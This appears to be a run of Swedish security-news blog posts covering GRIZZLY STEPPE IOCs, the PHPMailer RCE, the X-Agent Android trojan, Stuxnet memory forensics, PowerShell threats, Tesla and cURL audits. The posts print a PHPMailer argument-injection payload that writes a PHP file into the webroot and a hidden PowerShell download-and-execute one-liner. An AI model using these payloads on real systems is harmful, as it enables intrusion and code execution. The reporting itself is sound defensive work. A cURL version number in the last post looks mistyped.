Ryssland påverkade det amerikanska valet med hjälp av hackers

Amerikanska myndigheten DHS tillsammans med FBI släppte för några timmar sedan en teknisk rapport med titeln GRIZZLY STEPPE – Russian Malicious Cyber Activity.

Rapporten beskriver två hackinggrupper vid namn APT28 och APT29 samt deras tillvägagångssätt att angripa amerikanska intressen. Framförallt sådant som är relaterade till valet (APT = advanced persistent threat).

Med hjälp av fiktiv e-post (spearphising) så hackade APT28 ett amerikanskt parti och sedan exfiltrerade och släppte ut dokument publikt samt till press. Även den andra hackinggruppen APT29 har använt spearphising-attacker och skickat ut mail till över 1000 mottagare mot amerikanska intressen.

Min personliga bedömning är dock att konkreta bevis på att det är RIS (Russian Intelligence Service) som ligger bakom saknas. Detta framgår ej rapporterna, men förstår även att det är svårt att avhemliga information från exempelvis NSA.

Följande bild beskriver hur dessa två grupper jobbar med bl.a. X-Agent och X-Tunnel mjukvaran. Vi skrev senast om X-agent för några dagar sedan då den användes i en attack mot Ukraina.

Även så publicerar US Treasury en lista med personer som USA utför sanktioner mot. Den innehåller en del GRU-personer men även hackers.

Förutom ovan så finns det även flertalet IOC:er (indicators of compromise) där bl.a. tre svenska IP-nummer ska ha används för kontrollkanal eller på annat sätt vara inblandad i attackerna.

Troligtvis är detta hackade klienter eller servrar. Vissa även är eller har varit Tor-exitnoder:

95.215.44.115,IPV4ADDR,,IP_WATCHLIST,C2,,TLP:WHITE,This IP address is located in Sweden.
153.92.126.148,IPV4ADDR,,IP_WATCHLIST,,,TLP:WHITE,This IP address is located in Sweden.
185.86.148.111,IPV4ADDR,,IP_WATCHLIST,C2,,TLP:WHITE,This IP address is located in Sweden.
185.86.148.227,IPV4ADDR,,IP_WATCHLIST,C2,,TLP:WHITE,This IP address is located in Sweden.
185.86.149.223,IPV4ADDR,,IP_WATCHLIST,C2,,TLP:WHITE,This IP address is located in Sweden.
185.86.149.97,IPV4ADDR,,IP_WATCHLIST,,,TLP:WHITE,This IP address is located in Sweden.
185.7.34.251,IPV4ADDR,,IP_WATCHLIST,,,TLP:WHITE,This IP address is located in Sweden.
85.24.197.4,IPV4ADDR,,IP_WATCHLIST,C2,,TLP:WHITE,This IP address is located in Sweden.

Registrerade enligt whois på Exalt, Netbrella Networks samt:

Yourserver.se is a trademark
of Makonix Ltd, registered at
Ulbrokas 23, Riga, Latvia, LV-1021,
EU VAT number LV40103214759

Hela listan med IOC:er hittar du på denna sida. Har tittat i mina egna system efter dessa IP-adresser och hittar tusentals med intrångsförsök samt legitim trafik.

Här kan du ladda hem rapporten från FBI och DHS National Cybersecurity and Communications Integration Center (NCCIC):

Allvarlig säkerhetsbrist i PHPMailer

Dawid Golunski från Legal Hackers har upptäckt en ny allvarlig säkerhetsbrist i det populära biblioteket PHPMailer som används av miljontals mjukvaror såsom WordPress, Drupal, 1CRM, SugarCRM, Yii och Joomla.

Samtliga versioner innan 5.2.18 är sårbara för denna RCE (remote code execution). I dagsläget har Dawid ej släppt några detaljer om denna brist men troligtvis så rör det sig bara om timmar innan sårbarheten börjar att utnyttjas på internet.

En förmildrande faktor är att du måste ha ett kontaktformulär som använder sig av biblioteket. Samt så får angriparen samma behörigheter som användaren som webbservern körs som.

Denna sårbarhet har fått CVE-2016-10033, läs mer här.

Uppdatering: Tittar jag närmare på den commit som åtgärdar säkerhetsproblemet så ser den ut så här:

if (!empty($this->Sender) and $this->validateAddress($this->Sender)) {
    $params = sprintf('-f%s', escapeshellarg($this->Sender));
}

Dvs escapeshellarg()-funktionen läggs till. Troligtvis för att avsändaremail -f skickas med  ut till sendmail i commandline och gör det då möjligt att köra kommandon.

Uppdatering 2: Nu har Legal Hackers släppt en proof-of-concept exploit samt förklaring till sårbarheten. Och det är precis som vi anade ovan att extra data kan skickas vidare, dock inte helt enkelt som förklarat ovan:

Genom att skicka följande som avsändarepost:

”Attacker \” -Param2 -Param3″@test.com

Och detta skickas vidare till  PHPMailer (och även mail()) så exekveras sendmail lokalt med följande argument:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]

Exempelvis kan följande argument skickas med ovan för att skriva ut bodyn i ett meddelande till en fil som ligger i webbrooten:

-X/var/www/phpcode.php

Rysk statlig Android-trojan riktad mot ukrainska soldater

Amerikanska företaget CrowdStrike har tittat närmare på en Android-applikation som används av ukraniska soldater. Denna applikation underlättar hanteringen av kanonen 122 mm howitzer 2A18 (D-30) och beräknas ha 9000 användare.

Applikationen som går under namnet Попр-Д30.apk har utvecklats av en officerare inom den ukraniska militären. Nu har dock CrowdStrike upptäckt att APK:en innehåller FANCY BEAR X-Agent trojanen.

Aktören bakom FANCY BEAR-gruppen misstänks vara den ryska militära underrättelsetjänsten GRU (ГРУ).

Попр-Д30.apk md5: 6f7523d3019fa190499f327211e01fcb

Applikationen har ej funnits i Google Play-store och utvecklades mellan den 20 Februari och 13 April 2013.

Trojanen X-Agent som enbart används av FANCY BEAR även finns till iOS kan läsa av kontaktlistor, samtalshistorik, SMS samt internetdata. Även misstänks appen användas för att kartlägga truppförflyttningar och har troligtvis gett ryssland värdefull information vid annekteringen av Krim och Sevastopol.

Läs även: Appen som spelade en vital roll i det turkiska kuppförsöket

Skärmdump från appen:

Попр-Д30

Här kan du ladda hem rapporten om appen från CrowdStrike:

C2’17 – Ny spännande IT-säkerhetskonferens

Jag fick möjlighet att ställa några frågor till Åsa Schwarz som är en av initiativtagarna till den nya IT-säkerhetskonferensen Command & Control (C2) som går av stapeln den 17:de Januari 2017 i Stockholm.

Bland talarna på konferensen hittar vi bl.a Ulrika Evertsson Hansson som kommer att berätta om hur Militära underrättelse- och säkerhetstjänsten (MUST) aktivt arbetar med att få in it-säkerhet i hela systemutvecklingsprocessen och vilka säkerhetsfunktioner som måste omhändertas i Försvarsmaktens IT-system.

Anne-Marie Eklund-Löwinder, CISO på IIS kommer att berätta hur DNSSEC-roten är uppbyggd och säkrad med 7 st nycklar där Anne-Marie ansvarar för en av dessa nycklar.

Ovan två föredrag samt en mängda andra intressanta föredrag kommer att hållas under dagen, klicka här för om du vill se hela agendan.

Berätta vad Command and Control är för konferens?

Det är endagskonferens där vi får lyssna på några av Sveriges mest spännande företag och myndigheter. Vi har plockat ut aktuella ämnena inom it- och informationssäkerheten inför 2017. Några exempel är hur toppdomänen för internet förblir säker, hur Volvo arbetar med it-säkerhet i självkörande bilar och hur informationssäkerhet är en del av Polisens verksamhet.

Vilken målgrupp riktar ni Er till?

Främst till personer som under 2017 kommer att arbeta professionellt med it- och informationssäkerhetsfrågor. Vi kommer även ha ett antal studenter på plats eftersom vi inom kort kommer ha ett en stort brist på experter inom området och måste locka nya till branschen.

Ser ni ett behov att fylla?

Den svenska föreläsningsscenen inom säkerhetsområdet har varit relativt homogen, där samma personer ständigt återkommer år efter år. Vi har plockat ut några av Sveriges främsta experter som inte synts lika frekvent men som har väldigt mycket att bidra med. De kommer ge nya tankeväckande infallsvinklar och kunskap. Vi har också länge funderat på varför mässor, konferenser och expertpaneler har så få kvinnor inom it- och informationssäkerhetsområdet.

Svaret man ofta får är att det inte finns några. Vi tänkte en gång för alla visa att det inte stämmer. Eftersom marknaden växer kraftigt måste vi se till att bli en attraktiv bransch för alla som är intresserade av säkerhet. C2’17 är helt enkelt ett naturligt led i att vi vill göra Sverige till en av världens mest dynamiska säkerhetsarenor.

Vilka höjdpunkter ser du själv på konferensen?

Jag ser mycket fram emot mycket är att lyssna på råd från en organisationspsykolog hur vi får våra medarbetare att förändra beteende och arbeta på ett säkrare sätt. Det kommer säkert också bli mycket intressanta samtal under lunchen och möjlighet att knyta nya kontakter vid kaffet.

Vilka är ni som anordnar konferensen?

Vi som arrangerar och står bakom denna konferens är en grupp personer som tillsammans vill verka för att höja it- och informationssäkerheten i Sverige. Genom att förändra föreläsningsscenen, media och rekryteringsprinciper vill vi skapa en av världens mest dynamiska säkerhetsarenor. Vi kallar oss själva för Kontrollgruppen. Du hittar medlemmarna här: www.c217.se/arrangor

Vad har ni valt för plats och varför?

Vi kommer att vara på Bygget Fest & Konferens på Norrlandsgatan 11 i Stockholm.

Anledningen är att lokalen ligger centralt och att vi har både konferens och mingelytor för oss själva. Vi tycker att kontaktskapandet och dialogen mellan åhörarna är lika viktig som själva föreläsningarna. Den gemensamma kunskapen och erfarenheten bland alla deltagare är minst sagt imponerande.

Hemlig dataavläsning med myndighetstrojaner

Statsminister Stefan Löfven höll tidigare i år ett presstal där han framförde följande:

Säpo berättar exempelvis att när de avlyssnat telefoner så kan de höra att när man närmar sig ett känsligt område då säger de som avlyssnas nu går vi över till Skype. Därför kommer regeringen att ge uppdrag till utredare att ta fram förslag på hur åklagarmyndigheten, Säkerhetspolisen och polismyndigheten kan använda hemlig dataavläsning för att avlyssna också den information som kan skickas genom krypterade kanaler.

Och Löfven fortsätter:

Med hemlig dataavläsning avses att de brottsbekämpande myndigheterna i hemlighet sänder en mjukvara, en så kallad trojan, till en dator eller en surfplatta. Man kan också ha en hårdvara placerad fysiskt i datorn och därigenom får den brottsbekämpande myndigheten besked om vilken information som finns i datorn och hur datorn används i realtid.

myndighetstrojanOch intressant är vad konsekvenserna av ett sådant lagförslag kan bli. Det kan innebära att myndigheter då har behov att införskaffa zero-days i exempelvis iPhones för att planera trojaner (implantat).

Det vill säga att utnyttja sårbarheter som ej är kända av tillverkaren (exempelvis Apple) och ej ännu åtgärdats. Men dessa sårbarheter upptäckts sällan av enbart en aktör och nyttjas och säljs troligtvis även till diktaturer samt kriminell verksamhet som i fallet med italienska Hacking Team.

Men zero-days är dyra och kan kosta åtskilliga miljoner kronor och därför är andra metoder mer effektiva såsom att injecera trojaner i nedladdade icke signerade mjukvaror eller ”evil maid” attacker där fysisk tillgång finnes.

Givetvis påverkas även den enhet där trojanen installeras och kan i värsta fall förstöra eventuella bevis och förändra den avlyssnades beteende.

Dock så anser jag att lagförande myndigheter måste ges möjlighet att använda en verktygslåda som är uppdaterad till 2000-talet.

Tittar vi ute i världen så har flertalet misslyckade bundestrojaner utvecklats (staatstrojaner) där Tysklands trojan felaktig implementerade krypto samt skickade ut information över landets gränser som gjorde det möjligt för andra länders underrättelsetjänster ta del av avlyssningen.

Den statliga utredningen om hemlig dataavläsning (Ju 2016:12) kommer att redovisas senast 13 november 2017 på följande webbsida.

Oberoende granskning av OpenVPN

OpenVPN är ett otroligt populärt verktyg för att skapa upp VPN-anslutningar och används av majoriteten av alla VPN-tjänster. Private Internet Access (PIA) med bl.a. Rick Falkvinge kommer att betala för en oberoende granskning av OpenVPN som leds av kryptologen Dr. Matthew Green. Matthew hade tidigare hand om den öppna granskningen av TrueCrypt. PIA är ett företag som tillhandahåller VPN-anslutningar och som använder OpenVPN

OpenVPN har funnits sedan 2001 och använder en variant på SSL/TLS som kanal för kommunikation och går att köra på operativsystem såsom Solaris, Linux, OpenBSD, FreeBSD, NetBSD, QNX, Mac OS X, iOS, Android och Windows från version XP.

PIA meddelar att efter granskningen är klar och OpenVPN åtgärdat eventuella brister så kommer rapporten att publiceras på deras hemsida.

Senast en sårbarhet uppdagades i OpenVPN var under 2016 då födelsedags-attacken Sweet32 som går mot 64-bits algoritmer såsom den som OpenVPN använder som standard, BF-CBC.

Och viktigt att notera är att OpenVPN används på både klienten och servern. Ett alternativ till OpenVPN är att köra stunnel eller IPSEC.

Uppdatering: Under tiden jag skrev denna artikel har två andra relaterade nyheter dykt upp:

  • Algo lyfts upp som ett nytt alternativ till IPSec och OpenVPN
  • OSTIF meddelar att de anlitar Quarks Lab för att också granska OpenVPN. Samma franska företag som tidigare granskade VeraCrypt

Nytt verktyg för att upptäcka Stuxnet-liknande attacker

The Volatility Foundation som står bakom det IT-forensiska verktyget Volatility genomförde nyligen en tävling där den som tar fram det bästa pluginet till Volatility vinner 16000 SEK samt utbildning.

Vinnaren i tävlingen blev Monnappa K A som skapade hollowfind som underlättar detektion av process hollowing. En metod som avancerad skadlig kod såsom Stuxnet och Taidoor använt sig av. Metoden går ut på att byta ut en legitim process såsom lsass.exe mot den skadliga koden och på så sätt försvåra för antivirus samt IT-forensiska undersökningar.

Jag måste så klart testa detta nya plugin och se om det är möjligt att detektera Stuxnet, och som tur var så finns det färdiga minnesdumpar på infekterade datorer. Just denna minnesdump kommer från boken Malware Cookbook.

Först laddar vi hem minnesdumpen och packar upp den samt kontrollerar vilket OS som den skapats från:

$ for a in {a..d}; do wget https://github.com/ganboing/malwarecookbook/raw/master/stuxnet.vmem.zip.a$a; done
$ cat stuxnet.vmem.zip.a* > stuxnet.vmem.zip
$ unzip stuxnet.vmem.zip
$ volatility -f stuxnet.vmem imageinfo
$ export VOLATILITY_PROFILE=WinXPSP2x86

Och sedan laddar vi hem pluginet och testar det:

$ git clone https://github.com/monnappa22/HollowFind.git
$ volatility --plugins=./HollowFind/ -f stuxnet.vmem hollowfind

Vi ser då att två stycken lsass.exe flaggats som suspekta:

Type: Invalid EXE Memory Protection and Process Path Discrepancy

Volatility med HollowFind-plugin

Det var väl enkelt? Skulle vi analysera vidare så skulle vi även identifiera att lsass.exe lyssnar på port 500 samt 4500 vilket också är ett avvikande beteende. Även om man jämför antalet inladdade DLL:er:

$ volatility -f stuxnet.vmem sockets
$ volatility -f stuxnet.vmem pslist
$ volatility -f stuxnet.vmem dlllist -p 1928|wc -l
35
$ volatility -f stuxnet.vmem dlllist -p 868|wc -l
15
$ volatility -f stuxnet.vmem dlllist -p 680|wc -l
64

Ett till plugin för att försöka identifiera skadlig kod följer med och heter malfind.  Ett annat intressant bidrag i tävlingen och som kom på tredje plats är “The Advanced Malware Hunters Kit”.

Mer om tävlingen och andra bidrag kan du läsa här.

Cyberangrepp som använder PowerShell ökar

Powershell är ett avancerat skript-språk till Windows som funnits i över 10 år där målet är att byta ut klassiska CMD.exe i framtiden (DOS-kommandotolk). Exempelvis så är standardskalet i Windows 10 just PowerShell. PowerShell är också populärt bland Windows-administratörer för dess förmåga att underlätta admin-arbete och har många olika funktioner vilket även gör det populärt för skadlig kod.

Enligt säkerhetsföretaget Symantec så är 95.4% av alla analyserade powershell-skript skadliga och många organisationer saknar förmåga att upptäcka skadliga powershell-skript uppger företaget. Detta för att loggningen är bristfällig i standardkonfigurationen. Att obfuskera och ändra i powershell-skript och således undgå enklare kontroller i form av strängmatchning och checksummor är också trivialt.

Den senaste alfa-versionen av PowerShell som heter version 6 har utökat stöd för loggning och flertalet olika säkerhetshöjande funktioner.

Följande PowerShell-versioner används som standard i Microsofts olika operativsystem:

Det finns PowerShell-skript för nästan allt, från att skapa ett nätverkssniffer eller för läsa ut lösenord. Vissa hot, t.ex. som Trojan.Kotver som försöker att ladda hem och installera PowerShells-ramverk om den inte är installerad på den infekterade datorn. Även så stödjer PowerShell att ladda hem och exekvera kod direkt i minnet vilket kan försvåra forensiska undersökningar.

Exempel på kod som laddar ner och exekverar kod från Pastebin:

powershell -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient). DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”

Följande 37-sidiga whitepaper från Symantec innehåller en hel del matnyttigt:

Nytt hack mot Tesla-bilens CAN-buss

Jag kanske skulle skriva en rubrik såsom ”Så lätt hackar du en Tesla” men detta hack verkar allt annat än lätt. Dock synnerligen intressant om det går att genomföra rent praktiskt då det kräver ett antal olika steg för att lyckas.

Det är Keen Security Lab vid företaget Tencent som identifierat en säkerhetsbrist i Teslabilens Gateway ECU (Model S).

Genom att utnyttja en sårbarhet i bilens webbläsare så kan en antagonist få tillgång till bilens CAN-buss fjärrmäsigt och styra bilen. Detta genom en sårbarhet i bilens hantering av firmware. CAN-bussen används som en datasluss internt inom bilen för att kommunicera med exempelvis bromssystem, farthållare, anti-krocksystem och växellåda.

Amerikanska Department of Homeland Security (DHS) har därför gått ut med en varning och meddelar att en mjukvaruuppdatering har genomförts och kommer att automatiskt uppgraderas i bilen. Dock så påpekar DHS följande:

Crafting a working exploit for this vulnerability would be difficult. A complex chain of exploits is required, including a web browser compromise, local privilege escalation, and custom-built firmware.

Sårbarheten har CVE-2016-9337 och Tesla släppte uppdateringen den 18:de September 2016. Och för några veckor sedan så visade ett norskt företag hur en Tesla-bil kan stjälas genom att angripa ägarens mobiltelefon.

Cure53 granskar cURL

curlTyska IT-säkerhetsföretaget Cure53 har nu släppt en rapport gällande granskning av cURL. Granskningen sponsrades av Mozillas Secure Open Source och identifierade 23 säkerhetsrelaterade problem i källkoden.

Koden granskades av fem personer under 20 dagar samt så var fokus på cURL version 7.50.1. Av dessa 23 identifierade problem så var 9 st klassade som sårbarheter och 14 st som generella svagheter.

Fyra sårbarheter kan troligtvis leda till RCE (Remote Code Execution). Men du kan dock vara lugn för samtliga dessa rapporterade brister har åtgärdats den 2:a November och en uppgradering 7.71.0 löser problemen.

För mer information se curls säkerhetssida här:

Eller loggen för åtgärder som finnes på Google Docs.

Samt så kan du ladda hem Cure53:s rapport som PDF i sin helhet här nedan. Som vanligt så är det alltid intressant att läsa andras granskningar och således själv lära och bli en bättre granskare.

Cure53 granskning av cURL